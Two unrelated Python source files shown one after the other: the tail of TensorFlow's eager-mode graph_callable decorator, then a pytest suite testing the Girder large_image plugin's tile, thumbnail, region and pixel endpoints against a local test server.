x for x in captured_outlist if isinstance(x, tf_ops.Tensor)]
captured_function_name = function._inference_name(func.__name__) # pylint: disable=protected-access
captured_function = function.GraphModeFunction(
captured_function_name,
placeholder_inputs,
extra_inputs,
tmp_graph,
capturing_operations,
capture_func_def_outputs,
captured_outputs,
output_shapes,
variables=[x.variable for x in sorted_variables])
return _InitializingFunctionObject(captured_function, initializer_function,
shape_and_dtypes)
class ShapeAndDtype(object):
"""Data type that packages together shape and type information.
Used for arguments to graph callables. See graph_callable() for an example.
"""
def __init__(self, shape, dtype):
self.shape = shape
self.dtype = dtype
def graph_callable(shape_and_dtypes):
"""Decorator that produces a callable that executes a TensorFlow graph.
When applied on a function that constructs a TensorFlow graph, this decorator
produces a callable object that:
1. Executes the graph when invoked. The first call will initialize any
variables defined in the graph.
2. Provides a .variables() method to return the list of TensorFlow variables
defined in the graph.
Note that the wrapped function is not allowed to change the values of the
variables, just use them.
The return value of the wrapped function must be one of the following:
(1) None, (2) a Tensor, or (3) a possibly nested sequence of Tensors.
Example:
```python
@tfe.graph_callable([tfe.ShapeAndDtype(shape(), dtype=dtypes.float32)])
def foo(x):
v = tf.get_variable('v', initializer=tf.ones_initializer(), shape=())
return v + x
ret = foo(tfe.Tensor(2.0)) # `ret` here is a Tensor with value 3.0.
foo.variables[0].assign(7.0) # Modify the value of variable `v`.
ret = foo(tfe.Tensor(2.0)) # `ret` here now is a Tensor with value 9.0.
```
Args:
shape_and_dtypes: A possibly nested list or tuple of ShapeAndDtype objects
that specifies shape and type information for each of the callable's
arguments. The length of this list must be equal to the number of
arguments accepted by the wrapped function.
Returns:
A callable graph object.
"""
# TODO(alive,apassos): support initialized_value and friends from tf.Variable.
assert context.executing_eagerly(), (
"graph_callable can only be used when Eager execution is enabled.")
def decorator(func):
return tf_decorator.make_decorator(func,
_graph_callable_internal(
func, shape_and_dtypes))
return decorator
|
|
import math
from unittest import mock
import os
import pytest
import requests
import shutil
import struct
import time
from girder.constants import SortDir
from girder.models.file import File
from girder.models.item import Item
from girder.models.setting import Setting
from girder.models.token import Token
from girder.models.user import User
from girder_jobs.models.job import Job
from girder_large_image.models.image_item import ImageItem
from large_image import getTileSource
from girder_large_image import constants
from girder_large_image import getGirderTileSource
from girder_large_image import loadmodelcache
from . import girder_utilities as utilities
def _testTilesZXY(server, admin, itemId, metadata, tileParams=None,
imgHeader=utilities.JPEGHeader, token=None):
"""
Test that the tile server is serving images.
:param itemId: the item ID to get tiles from.
:param metadata: tile information used to determine the expected
valid queries. If 'sparse' is added to it, tiles
are allowed to not exist above that level.
:param tileParams: optional parameters to send to the tile query.
:param imgHeader: if something other than a JPEG is expected, this is
the first few bytes of the expected image.
"""
if tileParams is None:
tileParams = {}
if token:
kwargs = {'token': token}
else:
kwargs = {'user': admin}
# We should get images for all valid levels, but only within the
# expected range of tiles.
for z in range(metadata.get('minLevel', 0), metadata['levels']):
maxX = math.ceil(float(metadata['sizeX']) * 2 ** (
z - metadata['levels'] + 1) / metadata['tileWidth']) - 1
maxY = math.ceil(float(metadata['sizeY']) * 2 ** (
z - metadata['levels'] + 1) / metadata['tileHeight']) - 1
# Check the four corners on each level
for (x, y) in ((0, 0), (maxX, 0), (0, maxY), (maxX, maxY)):
resp = server.request(path='/item/%s/tiles/zxy/%d/%d/%d' % (
itemId, z, x, y), params=tileParams, isJson=False,
**kwargs)
if (resp.output_status[:3] != b'200' and
metadata.get('sparse') and z > metadata['sparse']):
assert utilities.respStatus(resp) == 404
continue
assert utilities.respStatus(resp) == 200
image = utilities.getBody(resp, text=False)
assert image[:len(imgHeader)] == imgHeader
# Check out of range each level
for (x, y) in ((-1, 0), (maxX + 1, 0), (0, -1), (0, maxY + 1)):
resp = server.request(path='/item/%s/tiles/zxy/%d/%d/%d' % (
itemId, z, x, y), params=tileParams, **kwargs)
if x < 0 or y < 0:
assert utilities.respStatus(resp) == 400
assert 'must be positive integers' in resp.json['message']
else:
assert utilities.respStatus(resp) == 404
assert ('does not exist' in resp.json['message'] or
'outside layer' in resp.json['message'])
# Check negative z level
resp = server.request(path='/item/%s/tiles/zxy/-1/0/0' % itemId,
params=tileParams, **kwargs)
assert utilities.respStatus(resp) == 400
assert 'must be positive integers' in resp.json['message']
# Check non-integer z level
resp = server.request(path='/item/%s/tiles/zxy/abc/0/0' % itemId,
params=tileParams, **kwargs)
assert utilities.respStatus(resp) == 400
assert 'must be integers' in resp.json['message']
# If we set the minLevel, test one lower than it
if 'minLevel' in metadata:
resp = server.request(path='/item/%s/tiles/zxy/%d/0/0' % (
itemId, metadata['minLevel'] - 1), params=tileParams, **kwargs)
assert utilities.respStatus(resp) == 404
assert 'layer does not exist' in resp.json['message']
# Check too large z level
resp = server.request(path='/item/%s/tiles/zxy/%d/0/0' % (
itemId, metadata['levels']), params=tileParams, **kwargs)
assert utilities.respStatus(resp) == 404
assert 'layer does not exist' in resp.json['message']
def _createTestTiles(server, admin, params=None, info=None, error=None):
"""
Discard any existing tile set on an item, then create a test tile set
with some optional parameters.
:param params: optional parameters to use for the tiles.
:param info: if present, the tile information must match all values in
this dictionary.
:param error: if present, expect to get an error from the tile info
query and ensure that this string is in the error
message.
:returns: the tile information dictionary.
"""
if params is None:
params = {}
try:
resp = server.request(path='/item/test/tiles', user=admin,
params=params)
if error:
assert utilities.respStatus(resp) == 400
assert error in resp.json['message']
return None
except AssertionError as exc:
if error:
assert error in exc.args[0]
return
else:
raise
assert utilities.respStatus(resp) == 200
infoDict = resp.json
if info:
for key in info:
assert infoDict[key] == info[key]
return infoDict
def _postTileViaHttp(server, admin, itemId, fileId, jobAction=None, data=None):
"""
When we know we need to process a job, we have to use an actual http
request rather than the normal simulated request to cherrypy. This is
required because cherrypy needs to know how it was reached so that
girder_worker can reach it when done.
:param itemId: the id of the item with the file to process.
:param fileId: the id of the file that should be processed.
:param jobAction: if 'delete', delete the job immediately.
:param data: if not None, pass this as the data to the POST request. If
specified, fileId is ignored (pass as part of the data dictionary if
it is required).
:returns: metadata from the tile if the conversion was successful,
False if it converted but didn't result in useable tiles, and
None if it failed.
"""
headers = {
'Accept': 'application/json',
'Girder-Token': str(Token().createToken(admin)['_id'])
}
req = requests.post('http://127.0.0.1:%d/api/v1/item/%s/tiles' % (
server.boundPort, itemId), headers=headers,
data={'fileId': fileId} if data is None else data)
assert req.status_code == 200
if jobAction == 'delete':
Job().remove(Job().find({}, sort=[('_id', SortDir.DESCENDING)])[0])
# Wait for the job to be complete
starttime = time.time()
while time.time() - starttime < 30:
req = requests.get(
'http://127.0.0.1:%d/api/v1/worker/status' % server.boundPort, headers=headers)
resp = req.json()
if resp.get('active') and not len(next(iter(resp['active'].items()))[1]):
resp = server.request(path='/item/%s/tiles' % itemId, user=admin)
if (utilities.respStatus(resp) == 400 and
'No large image file' in resp.json['message']):
break
time.sleep(0.1)
else:
# If we ask to create the item again right away, we should be told that
# either there is already a job running or the item has already been
# added
req = requests.post('http://127.0.0.1:%d/api/v1/item/%s/tiles' % (
server.boundPort, itemId), headers=headers,
data={'fileId': fileId} if data is None else data)
assert req.status_code == 400
assert ('Item already has' in req.json()['message'] or
'Item is scheduled' in req.json()['message'])
starttime = time.time()
resp = None
while time.time() - starttime < 30:
try:
resp = server.request(path='/item/%s/tiles' % itemId, user=admin)
assert utilities.respStatus(resp) == 200
break
except AssertionError:
result = resp.json['message']
if "didn't meet requirements" in result:
return False
if 'No large image file' in result:
return None
assert 'is still pending creation' in result
time.sleep(0.1)
assert utilities.respStatus(resp) == 200
return resp.json
@pytest.mark.usefixtures('unbindLargeImage')
@pytest.mark.plugin('large_image')
def testTilesFromPTIF(server, admin, fsAssetstore):
file = utilities.uploadExternalFile(
'data/sample_image.ptif.sha512', admin, fsAssetstore)
itemId = str(file['itemId'])
fileId = str(file['_id'])
# We should already have tile information. Ask to delete it so we can
# do other tests
resp = server.request(path='/item/%s/tiles' % itemId, method='DELETE',
user=admin)
assert utilities.respStatus(resp) == 200
assert resp.json['deleted'] is True
# Now we shouldn't have tile information
resp = server.request(path='/item/%s/tiles' % itemId, user=admin)
assert utilities.respStatus(resp) == 400
assert 'No large image file' in resp.json['message']
resp = server.request(path='/item/%s/tiles/zxy/0/0/0' % itemId, user=admin)
assert utilities.respStatus(resp) == 404
assert 'No large image file' in resp.json['message']
# Asking to delete the tile information succeeds but does nothing
resp = server.request(path='/item/%s/tiles' % itemId, method='DELETE',
user=admin)
assert utilities.respStatus(resp) == 200
assert resp.json['deleted'] is False
# Ask to make this a tile-based item with an invalid file ID
resp = server.request(path='/item/%s/tiles' % itemId, method='POST',
user=admin, params={'fileId': itemId})
assert utilities.respStatus(resp) == 400
assert 'No such file' in resp.json['message']
# Ask to make this a tile-based item properly
resp = server.request(path='/item/%s/tiles' % itemId, method='POST',
user=admin, params={'fileId': fileId})
assert utilities.respStatus(resp) == 200
# Now the tile request should tell us about the file. These are
# specific to our test file
resp = server.request(path='/item/%s/tiles' % itemId, user=admin)
assert utilities.respStatus(resp) == 200
tileMetadata = resp.json
assert tileMetadata['tileWidth'] == 256
assert tileMetadata['tileHeight'] == 256
assert tileMetadata['sizeX'] == 58368
assert tileMetadata['sizeY'] == 12288
assert tileMetadata['levels'] == 9
assert tileMetadata['magnification'] == 40
assert tileMetadata['mm_x'] == 0.00025
assert tileMetadata['mm_y'] == 0.00025
tileMetadata['sparse'] = 5
_testTilesZXY(server, admin, itemId, tileMetadata)
# Check that we conditionally get JFIF headers
resp = server.request(path='/item/%s/tiles/zxy/0/0/0' % itemId,
user=admin, isJson=False)
assert utilities.respStatus(resp) == 200
image = utilities.getBody(resp, text=False)
assert image[:len(utilities.JFIFHeader)] != utilities.JFIFHeader
resp = server.request(path='/item/%s/tiles/zxy/0/0/0' % itemId,
user=admin, isJson=False,
params={'encoding': 'JFIF'})
assert utilities.respStatus(resp) == 200
image = utilities.getBody(resp, text=False)
assert image[:len(utilities.JFIFHeader)] == utilities.JFIFHeader
resp = server.request(path='/item/%s/tiles/zxy/0/0/0' % itemId,
user=admin, isJson=False,
additionalHeaders=[('User-Agent', 'iPad')])
assert utilities.respStatus(resp) == 200
image = utilities.getBody(resp, text=False)
assert image[:len(utilities.JFIFHeader)] == utilities.JFIFHeader
resp = server.request(
path='/item/%s/tiles/zxy/0/0/0' % itemId, user=admin,
isJson=False, additionalHeaders=[(
'User-Agent', 'Mozilla/5.0 (Macintosh; Intel Mac OS X '
'10_12_3) AppleWebKit/602.4.8 (KHTML, like Gecko) '
'Version/10.0.3 Safari/602.4.8')])
assert utilities.respStatus(resp) == 200
image = utilities.getBody(resp, text=False)
assert image[:len(utilities.JFIFHeader)] == utilities.JFIFHeader
resp = server.request(
path='/item/%s/tiles/zxy/0/0/0' % itemId, user=admin,
isJson=False, additionalHeaders=[(
'User-Agent', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) '
'AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 '
'Safari/537.36')])
assert utilities.respStatus(resp) == 200
image = utilities.getBody(resp, text=False)
assert image[:len(utilities.JFIFHeader)] != utilities.JFIFHeader
# Ask to make this a tile-based item again
resp = server.request(path='/item/%s/tiles' % itemId, method='POST',
user=admin, params={'fileId': fileId})
assert utilities.respStatus(resp) == 400
assert 'Item already has' in resp.json['message']
# We should be able to delete the large image information
resp = server.request(path='/item/%s/tiles' % itemId, method='DELETE',
user=admin)
assert utilities.respStatus(resp) == 200
assert resp.json['deleted'] is True
# We should no longer have tile information
resp = server.request(path='/item/%s/tiles' % itemId, user=admin)
assert utilities.respStatus(resp) == 400
assert 'No large image file' in resp.json['message']
# We should be able to re-add it (we are also testing that fileId is
# optional if there is only one file).
resp = server.request(path='/item/%s/tiles' % itemId, method='POST',
user=admin)
assert utilities.respStatus(resp) == 200
resp = server.request(path='/item/%s/tiles' % itemId, user=admin)
assert utilities.respStatus(resp) == 200
@pytest.mark.usefixtures('unbindLargeImage')
@pytest.mark.plugin('large_image')
def testTilesFromTest(server, admin, fsAssetstore):
publicFolder = utilities.namedFolder(admin, 'Public')
file = utilities.uploadExternalFile(
'data/sample_image.ptif.sha512', admin, fsAssetstore)
items = [{'itemId': str(file['itemId']), 'fileId': str(file['_id'])}]
# We should already have tile information. Ask to delete it so we can
# do other tests
resp = server.request(path='/item/%s/tiles' % str(file['itemId']),
method='DELETE', user=admin)
assert utilities.respStatus(resp) == 200
assert resp.json['deleted'] is True
# Create a second item
resp = server.request(path='/item', method='POST', user=admin,
params={'folderId': publicFolder['_id'],
'name': 'test'})
assert utilities.respStatus(resp) == 200
itemId = str(resp.json['_id'])
items.append({'itemId': itemId})
# Check that we can't create a tile set with another item's file
resp = server.request(path='/item/%s/tiles' % itemId, method='POST',
user=admin,
params={'fileId': items[0]['fileId']})
assert utilities.respStatus(resp) == 400
assert 'The provided file must be in the provided item' in resp.json['message']
# Now create a test tile with the default options
params = {'encoding': 'JPEG'}
meta = _createTestTiles(server, admin, params, {
'tileWidth': 256, 'tileHeight': 256,
'sizeX': 256 * 2 ** 9, 'sizeY': 256 * 2 ** 9, 'levels': 10
})
_testTilesZXY(server, admin, 'test', meta, params)
# Test most of our parameters in a single special case
params = {
'minLevel': 2,
'maxLevel': 5,
'tileWidth': 160,
'tileHeight': 120,
'sizeX': 5000,
'sizeY': 3000,
'encoding': 'JPEG'
}
meta = _createTestTiles(server, admin, params, {
'tileWidth': 160, 'tileHeight': 120,
'sizeX': 5000, 'sizeY': 3000, 'levels': 6
})
meta['minLevel'] = 2
_testTilesZXY(server, admin, 'test', meta, params)
# Test the fractal tiles with PNG
params = {'fractal': 'true'}
meta = _createTestTiles(server, admin, params, {
'tileWidth': 256, 'tileHeight': 256,
'sizeX': 256 * 2 ** 9, 'sizeY': 256 * 2 ** 9, 'levels': 10
})
_testTilesZXY(server, admin, 'test', meta, params, utilities.PNGHeader)
# Test that the fractal isn't the same as the non-fractal
resp = server.request(path='/item/test/tiles/zxy/0/0/0', user=admin,
params=params, isJson=False)
image = utilities.getBody(resp, text=False)
resp = server.request(path='/item/test/tiles/zxy/0/0/0', user=admin,
isJson=False)
assert utilities.getBody(resp, text=False) != image
# Test each property with an invalid value
badParams = {
'minLevel': 'a',
'maxLevel': False,
'tileWidth': (),
'tileHeight': [],
'sizeX': {},
'sizeY': 1.3,
'encoding': 2,
}
for key in badParams:
err = ('parameter is an incorrect' if key != 'encoding' else
'Invalid encoding')
_createTestTiles(server, admin, {key: badParams[key]}, error=err)
@pytest.mark.usefixtures('unbindLargeImage')
@pytest.mark.plugin('large_image')
def testTilesFromPNG(boundServer, admin, fsAssetstore, girderWorker):
file = utilities.uploadTestFile('yb10kx5k.png', admin, fsAssetstore)
itemId = str(file['itemId'])
fileId = str(file['_id'])
tileMetadata = _postTileViaHttp(boundServer, admin, itemId, fileId)
assert tileMetadata['tileWidth'] == 256
assert tileMetadata['tileHeight'] == 256
assert tileMetadata['sizeX'] == 10000
assert tileMetadata['sizeY'] == 5000
assert tileMetadata['levels'] == 7
assert tileMetadata['magnification'] is None
assert tileMetadata['mm_x'] is None
assert tileMetadata['mm_y'] is None
_testTilesZXY(boundServer, admin, itemId, tileMetadata)
# Ask to make this a tile-based item with an missing file ID (there are
# now two files, so this will now fail).
resp = boundServer.request(path='/item/%s/tiles' % itemId, method='POST', user=admin)
assert utilities.respStatus(resp) == 400
assert 'Missing "fileId"' in resp.json['message']
# We should be able to delete the tiles
resp = boundServer.request(path='/item/%s/tiles' % itemId, method='DELETE', user=admin)
assert utilities.respStatus(resp) == 200
assert resp.json['deleted'] is True
# We should no longer have tile informaton
resp = boundServer.request(path='/item/%s/tiles' % itemId, user=admin)
assert utilities.respStatus(resp) == 400
assert 'No large image file' in resp.json['message']
# This should work with a PNG with transparency, too.
file = utilities.uploadTestFile('yb10kx5ktrans.png', admin, fsAssetstore)
itemId = str(file['itemId'])
fileId = str(file['_id'])
tileMetadata = _postTileViaHttp(boundServer, admin, itemId, fileId)
assert tileMetadata['tileWidth'] == 256
assert tileMetadata['tileHeight'] == 256
assert tileMetadata['sizeX'] == 10000
assert tileMetadata['sizeY'] == 5000
assert tileMetadata['levels'] == 7
_testTilesZXY(boundServer, admin, itemId, tileMetadata)
# We should be able to delete the tiles
resp = boundServer.request(path='/item/%s/tiles' % itemId, method='DELETE', user=admin)
assert utilities.respStatus(resp) == 200
assert resp.json['deleted'] is True
# We should no longer have tile information
resp = boundServer.request(path='/item/%s/tiles' % itemId, user=admin)
assert utilities.respStatus(resp) == 400
assert 'No large image file' in resp.json['message']
@pytest.mark.usefixtures('unbindLargeImage')
@pytest.mark.plugin('large_image')
def testTilesDeleteJob(boundServer, admin, fsAssetstore, girderWorker):
# Make sure we don't auto-create a largeImage
file = utilities.uploadTestFile('yb10kx5k.png', admin, fsAssetstore, name='yb10kx5k.tiff')
itemId = str(file['itemId'])
resp = boundServer.request(path='/item/%s/tiles' % itemId, user=admin)
assert utilities.respStatus(resp) == 400
assert 'No large image file' in resp.json['message']
# Try to create an image, but delete the job and check that it fails.
fileId = str(file['_id'])
result = _postTileViaHttp(boundServer, admin, itemId, fileId, jobAction='delete',
data={'countdown': 10, 'fileId': fileId})
assert result is None
# If we end the test here, girder_worker may upload a file that gets
# discarded, but do so in a manner that interfers with cleaning up the test
# temp directory. By running other tasks, this is less likely to occur.
# Creating it again should work
tileMetadata = _postTileViaHttp(boundServer, admin, itemId, fileId)
assert tileMetadata['levels'] == 7
@pytest.mark.usefixtures('unbindLargeImage')
@pytest.mark.plugin('large_image')
def testTilesFromGreyscale(boundServer, admin, fsAssetstore, girderWorker):
file = utilities.uploadTestFile('grey10kx5k.tif', admin, fsAssetstore)
itemId = str(file['itemId'])
fileId = str(file['_id'])
tileMetadata = _postTileViaHttp(boundServer, admin, itemId, fileId)
assert tileMetadata['tileWidth'] == 256
assert tileMetadata['tileHeight'] == 256
assert tileMetadata['sizeX'] == 10000
assert tileMetadata['sizeY'] == 5000
assert tileMetadata['levels'] == 7
assert tileMetadata['magnification'] is None
assert tileMetadata['mm_x'] is None
assert tileMetadata['mm_y'] is None
_testTilesZXY(boundServer, admin, itemId, tileMetadata)
@pytest.mark.usefixtures('unbindLargeImage')
@pytest.mark.plugin('large_image')
def testTilesFromUnicodeName(boundServer, admin, fsAssetstore, girderWorker):
# Unicode file names shouldn't cause problems when generating tiles.
file = utilities.uploadTestFile('yb10kx5k.png', admin, fsAssetstore)
# Our normal testing method doesn't pass through the unicode name
# properly, so just change it after upload.
file = File().load(file['_id'], force=True)
file['name'] = '\u0441\u043b\u0430\u0439\u0434'
file = File().save(file)
fileId = str(file['_id'])
itemId = str(file['itemId'])
item = Item().load(itemId, force=True)
item['name'] = 'item \u0441\u043b\u0430\u0439\u0434'
item = Item().save(item)
tileMetadata = _postTileViaHttp(boundServer, admin, itemId, fileId)
assert tileMetadata['tileWidth'] == 256
assert tileMetadata['tileHeight'] == 256
assert tileMetadata['sizeX'] == 10000
assert tileMetadata['sizeY'] == 5000
assert tileMetadata['levels'] == 7
assert tileMetadata['magnification'] is None
assert tileMetadata['mm_x'] is None
assert tileMetadata['mm_y'] is None
_testTilesZXY(boundServer, admin, itemId, tileMetadata)
@pytest.mark.usefixtures('unbindLargeImage')
@pytest.mark.plugin('large_image')
def testTilesWithUnicodeName(server, admin, fsAssetstore):
# Unicode file names shouldn't cause problems when accessing ptifs.
# This requires an appropriate version of the python libtiff module.
name = '\u0441\u043b\u0430\u0439\u0434.ptif'
origpath = utilities.externaldata('data/sample_image.ptif.sha512')
altpath = os.path.join(os.path.dirname(origpath), name)
if os.path.exists(altpath):
os.unlink(altpath)
shutil.copy(origpath, altpath)
file = utilities.uploadFile(altpath, admin, fsAssetstore)
itemId = str(file['itemId'])
resp = server.request(path='/item/%s/tiles' % itemId, user=admin)
assert utilities.respStatus(resp) == 200
tileMetadata = resp.json
assert tileMetadata['tileWidth'] == 256
assert tileMetadata['tileHeight'] == 256
assert tileMetadata['sizeX'] == 58368
assert tileMetadata['sizeY'] == 12288
@pytest.mark.usefixtures('unbindLargeImage')
@pytest.mark.plugin('large_image')
def testTilesFromBadFiles(boundServer, admin, fsAssetstore, girderWorker):
# As of vips 8.2.4, alpha and unusual channels are removed upon
# conversion to a JPEG-compressed tif file. Originally, we performed a
# test to show that these files didn't work. They now do (though if
# the file has a separated color space, it may not work as expected).
# Uploading a non-image file should run a job, but not result in tiles
file = utilities.uploadTestFile('notanimage.txt', admin, fsAssetstore)
itemId = str(file['itemId'])
fileId = str(file['_id'])
tileMetadata = _postTileViaHttp(boundServer, admin, itemId, fileId)
assert tileMetadata is None
resp = boundServer.request(path='/item/%s/tiles' % itemId,
method='DELETE', user=admin)
assert utilities.respStatus(resp) == 200
assert resp.json['deleted'] is False
@pytest.mark.usefixtures('unbindLargeImage')
@pytest.mark.plugin('large_image')
def testThumbnails(server, admin, fsAssetstore):
file = utilities.uploadExternalFile(
'data/sample_image.ptif.sha512', admin, fsAssetstore)
itemId = str(file['itemId'])
fileId = str(file['_id'])
# We should already have tile information. Ask to delete it so we can
# do other tests
resp = server.request(path='/item/%s/tiles' % itemId, method='DELETE',
user=admin)
assert utilities.respStatus(resp) == 200
assert resp.json['deleted'] is True
# We shouldn't be able to get a thumbnail yet
resp = server.request(path='/item/%s/tiles/thumbnail' % itemId,
user=admin)
assert utilities.respStatus(resp) == 400
assert 'No large image file' in resp.json['message']
# Ask to make this a tile-based item
resp = server.request(path='/item/%s/tiles' % itemId, method='POST',
user=admin, params={'fileId': fileId})
assert utilities.respStatus(resp) == 200
# Get metadata to use in our thumbnail tests
resp = server.request(path='/item/%s/tiles' % itemId, user=admin)
assert utilities.respStatus(resp) == 200
tileMetadata = resp.json
# Now we should be able to get a thumbnail
resp = server.request(path='/item/%s/tiles/thumbnail' % itemId,
user=admin, isJson=False)
assert utilities.respStatus(resp) == 200
image = utilities.getBody(resp, text=False)
assert image[:len(utilities.JPEGHeader)] == utilities.JPEGHeader
defaultLength = len(image)
# Test width and height using PNGs
resp = server.request(path='/item/%s/tiles/thumbnail' % itemId,
user=admin, isJson=False,
params={'encoding': 'PNG'})
assert utilities.respStatus(resp) == 200
image = utilities.getBody(resp, text=False)
assert image[:len(utilities.PNGHeader)] == utilities.PNGHeader
(width, height) = struct.unpack('!LL', image[16:24])
assert max(width, height) == 256
# We know that we are using an example where the width is greater than
# the height
origWidth = int(tileMetadata['sizeX'] *
2 ** -(tileMetadata['levels'] - 1))
origHeight = int(tileMetadata['sizeY'] *
2 ** -(tileMetadata['levels'] - 1))
assert height == int(width * origHeight / origWidth)
resp = server.request(path='/item/%s/tiles/thumbnail' % itemId,
user=admin, isJson=False,
params={'encoding': 'PNG', 'width': 200})
assert utilities.respStatus(resp) == 200
image = utilities.getBody(resp, text=False)
assert image[:len(utilities.PNGHeader)] == utilities.PNGHeader
(width, height) = struct.unpack('!LL', image[16:24])
assert width == 200
assert height == int(width * origHeight / origWidth)
# Test bad parameters
badParams = [
({'encoding': 'invalid'}, 400, 'Invalid encoding'),
({'width': 'invalid'}, 400, 'incorrect type'),
({'width': 0}, 400, 'Invalid width or height'),
({'width': -5}, 400, 'Invalid width or height'),
({'height': 'invalid'}, 400, 'incorrect type'),
({'height': 0}, 400, 'Invalid width or height'),
({'height': -5}, 400, 'Invalid width or height'),
({'jpegQuality': 'invalid'}, 400, 'incorrect type'),
({'jpegSubsampling': 'invalid'}, 400, 'incorrect type'),
({'fill': 'not a color'}, 400, 'unknown color'),
]
for entry in badParams:
resp = server.request(path='/item/%s/tiles/thumbnail' % itemId,
user=admin,
params=entry[0])
assert utilities.respStatus(resp) == entry[1]
assert entry[2] in resp.json['message']
# Test that we get a thumbnail from a cached file
resp = server.request(path='/item/%s/tiles/thumbnail' % itemId,
user=admin, isJson=False)
assert utilities.respStatus(resp) == 200
image = utilities.getBody(resp, text=False)
assert image[:len(utilities.JPEGHeader)] == utilities.JPEGHeader
assert len(image) == defaultLength
# We should report some thumbnails
item = Item().load(itemId, user=admin)
present, removed = ImageItem().removeThumbnailFiles(item, keep=10)
assert present > 2
# Remove the item, and then there should be zero files.
Item().remove(item)
present, removed = ImageItem().removeThumbnailFiles(item, keep=10)
assert present == 0
@pytest.mark.usefixtures('unbindLargeImage')
@pytest.mark.plugin('large_image')
def testContentDisposition(server, admin, fsAssetstore):
file = utilities.uploadExternalFile(
'data/sample_image.ptif.sha512', admin, fsAssetstore)
itemId = str(file['itemId'])
params = {'encoding': 'PNG', 'width': 200}
path = '/item/%s/tiles/thumbnail' % itemId
params['contentDisposition'] = 'inline'
resp = server.request(path=path, user=admin, isJson=False, params=params)
assert utilities.respStatus(resp) == 200
assert resp.headers['Content-Disposition'].startswith('inline')
assert (
resp.headers['Content-Disposition'].endswith('.png') or
'largeImageThumbnail' in resp.headers['Content-Disposition'])
params['contentDisposition'] = 'attachment'
resp = server.request(path=path, user=admin, isJson=False, params=params)
assert utilities.respStatus(resp) == 200
assert resp.headers['Content-Disposition'].startswith('attachment')
assert (
resp.headers['Content-Disposition'].endswith('.png') or
'largeImageThumbnail' in resp.headers['Content-Disposition'])
params['contentDisposition'] = 'other'
resp = server.request(path=path, user=admin, isJson=False, params=params)
assert utilities.respStatus(resp) == 200
assert (
resp.headers.get('Content-Disposition') is None or
'largeImageThumbnail' in resp.headers['Content-Disposition'])
del params['contentDisposition']
resp = server.request(path=path, user=admin, isJson=False, params=params)
assert utilities.respStatus(resp) == 200
assert (
resp.headers.get('Content-Disposition') is None or
'largeImageThumbnail' in resp.headers['Content-Disposition'])
@pytest.mark.usefixtures('unbindLargeImage')
@pytest.mark.plugin('large_image')
def testRegions(server, admin, fsAssetstore):
file = utilities.uploadExternalFile(
'data/sample_image.ptif.sha512', admin, fsAssetstore)
itemId = str(file['itemId'])
# Get metadata to use in our tests
resp = server.request(path='/item/%s/tiles' % itemId, user=admin)
assert utilities.respStatus(resp) == 200
tileMetadata = resp.json
# Test bad parameters
badParams = [
({'encoding': 'invalid', 'width': 10}, 400, 'Invalid encoding'),
({'width': 'invalid'}, 400, 'incorrect type'),
({'width': -5}, 400, 'Invalid output width or height'),
({'height': 'invalid'}, 400, 'incorrect type'),
({'height': -5}, 400, 'Invalid output width or height'),
({'jpegQuality': 'invalid', 'width': 10}, 400, 'incorrect type'),
({'jpegSubsampling': 'invalid', 'width': 10}, 400,
'incorrect type'),
({'left': 'invalid'}, 400, 'incorrect type'),
({'right': 'invalid'}, 400, 'incorrect type'),
({'top': 'invalid'}, 400, 'incorrect type'),
({'bottom': 'invalid'}, 400, 'incorrect type'),
({'regionWidth': 'invalid'}, 400, 'incorrect type'),
({'regionHeight': 'invalid'}, 400, 'incorrect type'),
({'units': 'invalid'}, 400, 'Invalid units'),
({'unitsWH': 'invalid'}, 400, 'Invalid units'),
]
for entry in badParams:
resp = server.request(path='/item/%s/tiles/region' % itemId,
user=admin,
params=entry[0])
assert utilities.respStatus(resp) == entry[1]
assert entry[2] in resp.json['message']
# Get a small region for testing. Our test file is sparse, so
# initially get a region where there is full information.
params = {'regionWidth': 1000, 'regionHeight': 1000,
'left': 48000, 'top': 3000}
resp = server.request(path='/item/%s/tiles/region' % itemId,
user=admin, isJson=False, params=params)
assert utilities.respStatus(resp) == 200
image = origImage = utilities.getBody(resp, text=False)
assert image[:len(utilities.JPEGHeader)] == utilities.JPEGHeader
# We can use base_pixels for width and height and fractions for top and
# left
params = {
'regionWidth': 1000,
'regionHeight': 1000,
'left': 48000.0 / tileMetadata['sizeX'],
'top': 3000.0 / tileMetadata['sizeY'],
'units': 'fraction',
'unitsWH': 'base'}
resp = server.request(path='/item/%s/tiles/region' % itemId,
user=admin, isJson=False, params=params)
assert utilities.respStatus(resp) == 200
image = utilities.getBody(resp, text=False)
assert image == origImage
# 0-sized results are allowed
params = {'regionWidth': 1000, 'regionHeight': 0,
'left': 48000, 'top': 3000, 'width': 1000, 'height': 1000}
resp = server.request(path='/item/%s/tiles/region' % itemId,
user=admin, isJson=False, params=params)
assert utilities.respStatus(resp) == 200
image = utilities.getBody(resp, text=False)
assert len(image) == 0
# Test scaling (and a sparse region from our file)
params = {'regionWidth': 2000, 'regionHeight': 1500,
'width': 500, 'height': 500, 'encoding': 'PNG'}
resp = server.request(path='/item/%s/tiles/region' % itemId,
user=admin, isJson=False, params=params)
assert utilities.respStatus(resp) == 200
image = utilities.getBody(resp, text=False)
assert image[:len(utilities.PNGHeader)] == utilities.PNGHeader
(width, height) = struct.unpack('!LL', image[16:24])
assert width == 500
assert height == 375
@pytest.mark.usefixtures('unbindLargeImage')
@pytest.mark.plugin('large_image')
def testPixel(server, admin, fsAssetstore):
file = utilities.uploadExternalFile(
'data/sample_image.ptif.sha512', admin, fsAssetstore)
itemId = str(file['itemId'])
# Test bad parameters
badParams = [
({'left': 'invalid'}, 400, 'incorrect type'),
({'top': 'invalid'}, 400, 'incorrect type'),
({'units': 'invalid'}, 400, 'Invalid units'),
]
for entry in badParams:
resp = server.request(path='/item/%s/tiles/pixel' % itemId,
user=admin,
params=entry[0])
assert utilities.respStatus(resp) == entry[1]
assert entry[2] in resp.json['message']
# Test a good query
resp = server.request(
path='/item/%s/tiles/pixel' % itemId, user=admin,
params={'left': 48000, 'top': 3000})
assert utilities.respStatus(resp) == 200
assert resp.json == {'r': 237, 'g': 248, 'b': 242}
# If it is outside of the image, we get an empty result
resp = server.request(
path='/item/%s/tiles/pixel' % itemId, user=admin,
params={'left': 148000, 'top': 3000})
assert utilities.respStatus(resp) == 200
assert resp.json == {}
@pytest.mark.usefixtures('unbindLargeImage')
@pytest.mark.plugin('large_image')
def testGetTileSource(server, admin, fsAssetstore):
file = utilities.uploadExternalFile(
'data/sample_image.ptif.sha512', admin, fsAssetstore)
